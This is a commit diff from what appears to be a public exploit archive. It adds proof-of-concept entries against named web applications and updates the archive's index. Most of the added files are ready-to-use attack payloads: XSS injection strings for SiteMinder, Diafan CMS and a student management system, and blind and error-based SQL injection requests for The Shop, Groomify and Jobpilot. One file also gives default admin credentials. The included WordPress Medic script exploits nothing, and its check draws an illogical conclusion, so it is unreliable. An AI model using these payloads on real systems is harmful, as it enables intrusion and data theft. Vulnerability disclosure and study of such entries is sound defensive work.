DB: 2023-06-20

8 changes to exploits/shellcodes/ghdb

Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)

BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)

Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)

Groomify v1.0 - SQL Injection

Jobpilot v2.61 - SQL Injection

Sales Tracker Management System v1.0 - Multiple Vulnerabilities

Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)

The Shop v2.5 - SQL Injection

WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass

exploits/hardware/webapps/51530.txt

@@ -0,0 +1,45 @@
+Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)
+Google Dork: N/A
+Date: 18-06-2023
+Exploit Author: Harshit Joshi
+Vendor Homepage: https://community.broadcom.com/home
+Software Link: https://www.broadcom.com/products/identity/siteminder
+Version:  12.52
+Tested on: Linux, Windows
+CVE: CVE-2023-23956
+Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221
+
+*Description:*
+I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have
+discovered in the  Symantec SiteMinder WebAgent. The vulnerability is
+related to the improper handling of user input and has been assigned the
+Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this
+vulnerability is 5.4.
+
+Vulnerability Details:
+---------------------
+*Impact:*
+
+This vulnerability allows an attacker to execute arbitrary JavaScript code
+in the context of the affected application.
+
+*Steps to Reproduce:*
+
+*First:*
+
+1) Visit -
+https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
+
+2) After visiting the above URL, click on the "*Change Password*" button,
+and the popup will appear.
+- The *SMAGENTNAME *parameter is the source of this vulnerability.
+*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
+
+*Second:*
+
+1) Visit -
+https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
+2) After visiting the above URL, click on the "*Change Password*" button,
+and the popup will appear.
+- The *TARGET *parameter is the source of this vulnerability.
+*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

exploits/php/webapps/51525.txt

@@ -0,0 +1,44 @@
+# Exploit Title: The Shop v2.5 - SQL Injection
+# Date: 2023-06-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://codecanyon.net/item/the-shop/34858541
+# Demo Site: https://shop.activeitzone.com
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /api/v1/carts/add HTTP/1.1
+Content-Type: application/json
+Accept: application/json, text/plain, */*
+x-requested-with: XMLHttpRequest
+x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4
+Referer: https://localhost
+Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;
+the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7
+Content-Length: 81
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}
+
+
+### Parameter & Payloads ###
+
+Parameter: JSON qty ((custom) POST)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
+    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)
+THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)
+END))","temp_user_id":null}
+
+    Type: time-based blind
+    Title: MySQL > 5.0.12 OR time-based blind (heavy query)
+    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR
+2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
+INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS
+C)","temp_user_id":null}

exploits/php/webapps/51526.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Groomify v1.0 - SQL Injection
+# Date: 2023-06-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
+# Demo Site: https://script.bugfinder.net/groomify
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Vulnerable URL ###
+
+https://localhost/groomify/blog-search?search=payload
+
+
+### Parameter & Payloads ###
+
+Parameter: search (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf)
+AND 'rszk'='rszk

exploits/php/webapps/51527.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Jobpilot v2.61 - SQL Injection
+# Date: 2023-06-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
+# Demo Site: https://jobpilot.templatecookie.com
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Parameter: long (GET)
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (EXTRACTVALUE)
+    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
+AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT
+(ELT(4894=4894,1))),0x71786b7171)) AND
+(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
+Fire Contract Counties, California, United
+States&category=&price_min=&price_max=&tag=
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
+AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND
+(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
+Fire Contract Counties, California, United
+States&category=&price_min=&price_max=&tag=

exploits/php/webapps/51528.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)
+# Date of found: 12/05/2023
+# Exploit Author: VIVEK CHOUDHARY @sudovivek
+# Version: V1.0
+# Tested on: Windows 10
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/
+# CVE: CVE-2023-33580
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580
+
+Vulnerability Description -
+
+    The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code.
+
+
+Steps to Reproduce -
+
+    The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0:
+
+        1.  Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php.
+
+        2.  Click on the "Admin" button to navigate to the admin login page.
+
+        3.  Login to the Admin account using the default credentials.
+                - Username: admin
+                - Password: Test@123
+
+        4.  Proceed to the Admin Profile page.
+
+        5.  Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.
+
+        6.  Click on the "Submit" button.
+
+        7.  Refresh the page, and the injected payload will be executed.
+
+
+As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.

exploits/php/webapps/51529.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
+# Exploit Author: tmrswrr / Hulya Karabag
+# Vendor Homepage: https://www.diafancms.com/
+# Version: 6.0
+# Tested on: https://demo.diafancms.com
+
+
+Description:
+
+1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
+Payload : "><script>alert(document.domain)<%2Fscript>
+2) After will you see alert button :
+https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0

exploits/php/webapps/51531.py

@@ -0,0 +1,44 @@
+# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password
+# Dork: inurl:/wp-includes/class-wp-query.php
+# Date: 2023-06-19
+# Exploit Author: Amirhossein Bahramizadeh
+# Category : Webapps
+# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html
+# Version: 1.0.0 (REQUIRED)
+# Tested on: Windows/Linux
+# CVE: CVE-2020-11027
+
+import requests
+from bs4 import BeautifulSoup
+from datetime import datetime, timedelta
+
+# Set the WordPress site URL and the user email address
+site_url = 'https://example.com'
+user_email = 'user@example.com'
+
+# Get the password reset link from the user email
+# You can use any email client or library to retrieve the email
+# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'
+with open('password_reset_email.html', 'r') as f:
+    email = f.read()
+    soup = BeautifulSoup(email, 'html.parser')
+    reset_link = soup.find('a', href=True)['href']
+    print(f'Reset Link: {reset_link}')
+
+# Check if the password reset link expires upon changing the user password
+response = requests.get(reset_link)
+if response.status_code == 200:
+    # Get the expiration date from the reset link HTML
+    soup = BeautifulSoup(response.text, 'html.parser')
+    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]
+    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')
+    print(f'Expiration Date: {expiration_date}')
+
+    # Check if the expiration date is less than 24 hours from now
+    if expiration_date < datetime.now() + timedelta(hours=24):
+        print('Password reset link expires upon changing the user password.')
+    else:
+        print('Password reset link does not expire upon changing the user password.')
+else:
+    print(f'Error fetching reset link: {response.status_code} {response.text}')
+    exit()

files_exploits.csv

@@ -4796,6 +4796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48652,exploits/hardware/webapps/48652.txt,"SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)",2020-07-08,"Metin Yunus Kandemir",webapps,hardware,,2020-07-08,2020-07-08,0,CVE-2020-15046,,,,,
 48668,exploits/hardware/webapps/48668.txt,"SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)",2020-07-15,"Metin Yunus Kandemir",webapps,hardware,,2020-07-15,2020-07-15,0,CVE-2020-15046,,,,,
 46971,exploits/hardware/webapps/46971.txt,"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion",2019-06-06,"Dhiraj Mishra",webapps,hardware,,2019-06-06,2019-06-06,0,CVE-2019-12477,,,,,
+51530,exploits/hardware/webapps/51530.txt,"Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)",2023-06-19,"Harshit Joshi",webapps,hardware,,2023-06-19,2023-06-19,0,CVE-2023-23956,,,,,
 45894,exploits/hardware/webapps/45894.txt,"Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)",2018-11-21,LiquidWorm,webapps,hardware,,2018-11-21,2018-11-21,0,,"Cross-Site Request Forgery (CSRF)",,,,
 42434,exploits/hardware/webapps/42434.py,"Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution",2017-08-08,"Kacper Szurek",webapps,hardware,,2017-08-08,2017-08-08,1,CVE-2017-11155;CVE-2017-11154;CVE-2017-11153;CVE-2017-11152;CVE-2017-11151,,,,,https://blogs.securiteam.com/index.php/archives/3356
 43885,exploits/hardware/webapps/43885.txt,"SysAid Help Desk 14.4 - Multiple Vulnerabilities",2015-06-10,"Pedro Ribeiro",webapps,hardware,,2018-01-25,2018-01-25,0,CVE-2015-3001;CVE-2015-3000;CVE-2015-2999;CVE-2015-2998;CVE-2015-2997;CVE-2015-2996;CVE-2015-2995;CVE-2015-2994;CVE-2015-2993,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/sysaid-14.4-multiple-vulns.txt
@@ -15013,7 +15014,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12419,exploits/php/webapps/12419.txt,"Boutique SudBox 1.2 - Cross-Site Request Forgery (Changer Login et Mot de Passe)",2010-04-27,indoushka,webapps,php,,2010-04-26,,1,,,,,,
 26877,exploits/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php,,2005-12-19,2013-07-16,1,CVE-2005-4375;OSVDB-21821,,,,,https://www.securityfocus.com/bid/15936/info
 30083,exploits/php/webapps/30083.txt,"BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,webapps,php,,2013-12-06,2013-12-06,0,OSVDB-100746,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5163.php
-51108,exploits/php/webapps/51108.txt,"BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)",2023-03-28,zetc0de,webapps,php,,2023-03-28,2023-03-28,0,CVE-2022-3552,,,,,
+51108,exploits/php/webapps/51108.txt,"BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)",2023-03-28,zetc0de,webapps,php,,2023-03-28,2023-06-19,1,CVE-2022-3552,,,,,
 41084,exploits/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,webapps,php,,2017-01-17,2017-01-17,0,,,,,http://www.exploit-db.comBoZoN-master.zip,
 7930,exploits/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",webapps,php,,2009-01-29,,1,OSVDB-51725;OSVDB-51724,,,,,
 9838,exploits/php/webapps/9838.pl,"BPGames 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,php,,2009-09-21,,1,CVE-2009-3500;OSVDB-58297;OSVDB-58296,,,,,
@@ -16771,6 +16772,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15853,exploits/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,webapps,php,,2010-12-29,2010-12-29,0,,,,,,
 8727,exploits/php/webapps/8727.txt,"DGNews 3.0 Beta - 'id' SQL Injection",2009-05-18,Cyber-Zone,webapps,php,,2009-05-17,,1,OSVDB-54658;CVE-2009-1746,,,,,
 32567,exploits/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-04,Lostmon,webapps,php,,2008-11-04,2014-03-28,1,CVE-2008-6297;OSVDB-49556,,,,,https://www.securityfocus.com/bid/32117/info
+51529,exploits/php/webapps/51529.txt,"Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)",2023-06-19,tmrswrr,webapps,php,,2023-06-19,2023-06-19,0,,,,,,
 15969,exploits/php/webapps/15969.txt,"diafan.cms 4.3 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",webapps,php,,2011-01-11,2011-01-11,0,OSVDB-70399;CVE-2011-5318,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_diafan_cms.html
 34414,exploits/php/webapps/34414.txt,"DiamondList - '/user/main/update_category?category[description]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-3023;OSVDB-67124,,,,,https://www.securityfocus.com/bid/42252/info
 34413,exploits/php/webapps/34413.txt,"DiamondList - '/user/main/update_settings?setting[site_title]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-3023;OSVDB-67123,,,,,https://www.securityfocus.com/bid/42252/info
@@ -19224,6 +19226,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11107,exploits/php/webapps/11107.txt,"gridcc script 1.0 - SQL Injection / Cross-Site Scripting",2010-01-11,Red-D3v1L,webapps,php,,2010-01-10,,1,,,,,,
 45795,exploits/php/webapps/45795.txt,"Grocery crud 1.6.1 - 'search_field' SQL Injection",2018-11-06,"Loading Kura Kura",webapps,php,80,2018-11-06,2018-11-07,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comgrocery-crud-1.6.1.zip,
 48792,exploits/php/webapps/48792.txt,"grocy 2.7.1 - Persistent Cross-Site Scripting",2020-09-07,"Mufaddal Masalawala",webapps,php,,2020-09-07,2020-09-07,0,,,,,,
+51526,exploits/php/webapps/51526.txt,"Groomify v1.0 - SQL Injection",2023-06-19,"Ahmet Ümit BAYRAM",webapps,php,,2023-06-19,2023-06-19,0,,,,,,
 7954,exploits/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",webapps,php,,2009-02-02,,1,OSVDB-51821;CVE-2009-0463,,,,,
 7878,exploits/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php?cat' SQL Injection",2009-01-26,nuclear,webapps,php,,2009-01-25,,1,OSVDB-51628;CVE-2009-0299,,,,,
 9236,exploits/php/webapps/9236.txt,"Groone's GLink ORGanizer 2.1 - 'cat' Blind SQL Injection",2009-07-23,"599eme Man",webapps,php,,2009-07-22,2016-10-27,1,CVE-2009-0299;OSVDB-51628,,,,,
@@ -20429,6 +20432,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46663,exploits/php/webapps/46663.txt,"Jobgator - 'experience' SQL Injection",2019-04-08,"Ahmet Ümit BAYRAM",webapps,php,80,2019-04-08,2019-04-08,0,,"SQL Injection (SQLi)",,,,
 8318,exploits/php/webapps/8318.txt,"JobHut 1.2 - 'pk' SQL Injection",2009-03-30,K-159,webapps,php,,2009-03-29,,1,OSVDB-53001;CVE-2009-4797,,,,,
 8329,exploits/php/webapps/8329.txt,"JobHut 1.2 - Remote Password Change/Delete/Activate User",2009-03-31,"ThE g0bL!N",webapps,php,,2009-03-30,,1,,,,,,
+51527,exploits/php/webapps/51527.txt,"Jobpilot v2.61 - SQL Injection",2023-06-19,"Ahmet Ümit BAYRAM",webapps,php,,2023-06-19,2023-06-19,0,,,,,,
 12461,exploits/php/webapps/12461.txt,"JobPost - SQL Injection",2010-04-30,Sid3^effects,webapps,php,,2010-04-29,,1,OSVDB-64218;CVE-2010-1727,,,,,
 43203,exploits/php/webapps/43203.txt,"Jobs2Careers / Coroflot Clone - SQL Injection",2017-11-30,8bitsec,webapps,php,,2017-12-01,2017-12-01,0,,,,,,
 10516,exploits/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-17,bi0,webapps,php,,2009-12-16,,0,,,,,,
@@ -28873,7 +28877,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7267,exploits/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,webapps,php,,2008-11-27,2017-01-04,1,OSVDB-57400;CVE-2008-7077,,,,,
 49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php,,2020-12-23,2020-12-23,0,,,,,,
 46840,exploits/php/webapps/46840.txt,"Sales ERP 8.1 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80,2019-05-14,2019-06-10,0,,"SQL Injection (SQLi)",,,,
-51513,exploits/php/webapps/51513.txt,"Sales Tracker Management System v1.0 - Multiple Vulnerabilities",2023-06-13,"AFFAN AHMED",webapps,php,,2023-06-13,2023-06-13,0,CVE-2023-3184,,,,,
+51513,exploits/php/webapps/51513.txt,"Sales Tracker Management System v1.0 - Multiple Vulnerabilities",2023-06-13,"AFFAN AHMED",webapps,php,,2023-06-13,2023-06-19,1,CVE-2023-3184,,,,,
 50659,exploits/php/webapps/50659.txt,"SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)",2022-01-13,"Betul Denizler",webapps,php,,2022-01-13,2022-01-13,0,,,,,,
 37642,exploits/php/webapps/37642.txt,"SaltOS - 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",webapps,php,,2012-08-18,2015-07-19,1,,,,,,https://www.securityfocus.com/bid/55117/info
 45734,exploits/php/webapps/45734.txt,"SaltOS Erp Crm 3.1 r8126 - Database File Download",2018-10-29,"Ihsan Sencan",webapps,php,80,2018-10-29,2018-10-29,0,CVE-2018-18762,,,,,
@@ -30093,6 +30097,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50782,exploits/php/webapps/50782.txt,"Student Record System 1.0 - 'cid' SQLi (Authenticated)",2022-02-23,"Mohd. Anees",webapps,php,,2022-02-23,2022-02-23,0,,,,,,
 49513,exploits/php/webapps/49513.txt,"Student Record System 4.0 - 'cid' SQL Injection",2021-02-02,"Jannick Tiger",webapps,php,,2021-02-02,2021-02-02,0,,,,,,
 49974,exploits/php/webapps/49974.txt,"Student Result Management System 1.0 - 'class' SQL Injection",2021-06-10,"Riadh Benlamine",webapps,php,,2021-06-10,2021-06-10,0,,,,,,
+51528,exploits/php/webapps/51528.txt,"Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)",2023-06-19,"VIVEK CHOUDHARY",webapps,php,,2023-06-19,2023-06-19,0,CVE-2023-33580,,,,,
 8481,exploits/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - 'profile' Arbitrary File Upload",2009-04-20,JosS,webapps,php,,2009-04-19,,1,OSVDB-53813;CVE-2009-1483,,,,,
 8509,exploits/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",webapps,php,,2009-04-20,,1,,,,,,
 41112,exploits/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
@@ -30541,6 +30546,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8642,exploits/php/webapps/8642.txt,"The Recipe Script 5 - Authentication Bypass / Database Backup",2009-05-08,TiGeR-Dz,webapps,php,,2009-05-07,,1,OSVDB-54556;CVE-2009-1662,,,,,
 8967,exploits/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",webapps,php,,2009-06-14,,1,OSVDB-55127,,,,,
 28886,exploits/php/webapps/28886.txt,"The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion",2006-10-30,"Cyber Security",webapps,php,,2006-10-30,2013-10-12,1,,,,,,https://www.securityfocus.com/bid/20831/info
+51525,exploits/php/webapps/51525.txt,"The Shop v2.5 - SQL Injection",2023-06-19,"Ahmet Ümit BAYRAM",webapps,php,,2023-06-19,2023-06-19,0,,,,,,
 10594,exploits/php/webapps/10594.txt,"The Uploader 2.0 - Arbitrary File Upload",2009-12-22,"Master Mind",webapps,php,,2009-12-21,,1,,,,,http://www.exploit-db.comthe_uploader_2.0-Ita.zip,
 10599,exploits/php/webapps/10599.txt,"The Uploader 2.0 - File Disclosure",2009-12-22,Stack,webapps,php,,2009-12-21,,1,OSVDB-61270;CVE-2009-4816,,,,,
 18518,exploits/php/webapps/18518.rb,"The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",webapps,php,,2012-02-23,2012-03-16,0,CVE-2011-2944;OSVDB-79508,"Metasploit Framework (MSF)",,,http://www.exploit-db.comTheUploader2.0.4-Eng.zip,
@@ -33701,6 +33707,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38041,exploits/php/webapps/38041.txt,"WordPress Theme Madebymilk - 'id' SQL Injection",2012-11-20,"Ashiyane Digital Security Team",webapps,php,,2012-11-20,2015-09-01,1,OSVDB-87821,,,,,https://www.securityfocus.com/bid/56608/info
 38057,exploits/php/webapps/38057.txt,"WordPress Theme Magazine Basic - 'id' SQL Injection",2012-11-22,"Novin hack",webapps,php,,2012-11-22,2015-09-02,1,OSVDB-87838,,,,,https://www.securityfocus.com/bid/56664/info
 29670,exploits/php/webapps/29670.txt,"WordPress Theme Make A Statement (MaS) - Cross-Site Request Forgery",2013-11-18,DevilScreaM,webapps,php,80,2013-11-18,2013-11-18,0,OSVDB-99043,,,,,
+51531,exploits/php/webapps/51531.py,"WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password",2023-06-19,"Amirhossein Bahramizadeh",webapps,php,,2023-06-19,2023-06-19,0,CVE-2020-11027,,,,,
 36186,exploits/php/webapps/36186.txt,"WordPress Theme Morning Coffee 3.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,webapps,php,,2011-09-30,2015-02-26,1,CVE-2011-3862;OSVDB-75957,,,,,https://www.securityfocus.com/bid/49878/info
 38102,exploits/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' SQL Injection",2012-12-04,"Ashiyane Digital Security Team",webapps,php,,2012-12-04,2015-09-08,1,OSVDB-88298,,,,,https://www.securityfocus.com/bid/56792/info
 39894,exploits/php/webapps/39894.php,"WordPress Theme Newspaper 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,webapps,php,80,2016-06-06,2016-06-06,0,,,,,,
@@ -34447,7 +34454,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17593,exploits/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,webapps,php,,2011-08-01,2013-12-09,0,OSVDB-74198;CVE-2013-0332,,,,,
 41239,exploits/php/webapps/41239.txt,"Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery",2017-02-03,"Tim Herres",webapps,php,80,2017-02-03,2017-02-03,0,,,,,http://www.exploit-db.comZoneMinder-1.30.0.tar.gz,https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
 47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,,2019-07-01,2019-07-03,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comzoneminder-1.32.3.tar.gz,
-51071,exploits/php/webapps/51071.py,"Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass",2023-03-27,"Trenches of IT",webapps,php,,2023-03-27,2023-03-27,0,CVE-2022-39291;CVE-2022-39290;CVE-2022-39285,,,,,
+51071,exploits/php/webapps/51071.py,"Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass",2023-03-27,"Trenches of IT",webapps,php,,2023-03-27,2023-06-19,1,CVE-2022-39291;CVE-2022-39290;CVE-2022-39285,,,,,
 2142,exploits/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",webapps,php,,2006-08-06,,1,OSVDB-27775;CVE-2006-4036,,,,,
 29091,exploits/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution",2013-10-20,"Halim Cruzito",webapps,php,,2013-10-23,2013-10-23,1,CVE-2011-4275;CVE-2009-4140;OSVDB-59051,,,,http://www.exploit-db.comzonPHPv225.zip,
 49501,exploits/php/webapps/49501.txt,"Zoo Management System 1.0 - 'anid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2021-02-01,0,,,,,,